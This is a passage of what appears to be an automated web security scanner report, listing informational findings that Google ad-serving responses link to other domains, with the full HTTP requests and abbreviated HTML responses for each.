Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:15:30 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-trustedidcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.juniper.net%26adT%3DSecure%2BSMB%2BNetwork%26adU%3Dvulnerability.scan.qualys.com%26adT%3DWireless%2BVulnerability%26gl%3DUS&amp;usg=AFQjCNECg0wCSq3p5ZzPvpYN2bAZQKj4UA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.441. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679400&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661400135&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661400140&frm=1&adk=2614322350&ga_vid=1052894406.1303661400&ga_sid=1303661400&ga_hid=1497103527&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:09:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14674

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3Dwww.Booksurge.com%26adT%3DAmazon%2Bself%2Bpublishing%26adU%3DAmazonRiverCruises.com%26adT%3DAmazon%2BRiver%2BCruises%26gl%3DUS&amp;usg=AFQjCNHEbY_hYtfqCh6Iod2zU1OqQiZErQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.442. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681618&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663618200&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663618205&frm=1&adk=2614322350&ga_vid=47448445.1303663618&ga_sid=1303663618&ga_hid=1021463276&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:46:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14748

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.areasys.com%26adT%3DServers%2Bwith%2BIntel%2BXeon%26adU%3Dtripplite.com/CoolingSolution%26adT%3DCooling%2BSolutions%26adU%3DNetApp.com/us%26adT%3DData%2BStorage%2Bfor%2BWindows%25C2%25AE%26adU%3Dwww.Isilon.com%26adT%3DDataCenter%2BVirtualization%26gl%3DUS&amp;usg=AFQjCNGiSl2M-72tOvinw-LbrbfCEWaysQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.443. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303648039933&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303648039951&frm=1&adk=2614322350&ga_vid=487742829.1303648040&ga_sid=1303648040&ga_hid=1301447053&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=20 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:27:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3061

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
<NOSCRIPT><a href="http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.17612&rtbip=63.251.90.151&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAGr14_zDZABhKsHoAEBqAGmswewAQI&redirecturl2=http://ad.doubleclick.net/jump/N2886.151350.QUANTCAST.COM/B5403001.15;abr=!ie4;abr=!ie5;sz=160x600;ord=17612?"><IMG SRC="http://ad.doubleclick.net/ad/N2886.151350.QUANTCAST.COM/B5403001.15;abr=!ie4;abr=!ie5;sz=160x600;ord=17612?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement">
...[SNIP]...
</IFRAME><img src="http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif?media=ad&p=TbQXJAALpVwK5TnRfqQSI1_Js-0UbAqvFf0wDA&r=156965908&rand=17612&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=0,_imp.optver.26,_imp.optscore.104,_imp.optdr.0&rtbip=63.251.90.151&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAGr14_zDZABhKsHoAEBqAGmswewAQI" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

23.444. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680234&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662234264&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662234269&frm=1&adk=2614322350&ga_vid=395860616.1303662234&ga_sid=1303662234&ga_hid=815145858&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:23:51 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14874

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Dwww.proaudiostash.com%26adT%3D19%2526quot%253B%2BLaptop%2BDrawer%26adU%3DAPC.com/DataCenterUniversity%26adT%3DRack%2BTechnologies%26gl%3DUS&amp;usg=AFQjCNEiVrBnuuTUwAbh-vxRyo-iD9emXg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.445. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680199&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662199634&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662199639&frm=1&adk=2614322350&ga_vid=1090061126.1303662200&ga_sid=1303662200&ga_hid=2045597732&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:23:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Cadillac.com/SRX%26adT%3DMB%2BGL-Class%2Bvs%2BSRX%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.GMC.com/Yukon%26adT%3DMB%2BGL450%2Bvs%2BGMC%2BYukon%26adU%3DAutoInsurance.Insure.com%26adT%3DMercedes%2BInsurance%2BRates%26adU%3DMBUSA.com/CPO%26adT%3DCertified%2BPre-Owned%2BEvent%26gl%3DUS&amp;usg=AFQjCNFGPPX3oNz2jhkXxelEOdYXzIrlDQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.446. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676458&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658458620&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303658458624&frm=1&adk=2614322350&ga_vid=648576074.1303658459&ga_sid=1303658459&ga_hid=197278331&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1923

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbQ_1wAJrvsK5XTDK_JR_mk9Pq5oBkh-6BZCyA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.447. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303679705&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html&dt=1303661705082&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661705094&frm=0&adk=1607234649&ga_vid=562925029.1303661705&ga_sid=1303661705&ga_hid=1972696677&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=16&xpc=RdbLHDqKBx&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:15:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12695

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19> <span class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.GoKeyless.com%26adT%3DKeyless%2BLocks%2BOutlet%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&amp;usg=AFQjCNEzbGQxlINk0Xd2-RRJlhgWmNtASA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.448. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676606&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658606775&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658606780&frm=1&adk=2614322350&ga_vid=1570881348.1303658607&ga_sid=1303658607&ga_hid=1994203513&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1369

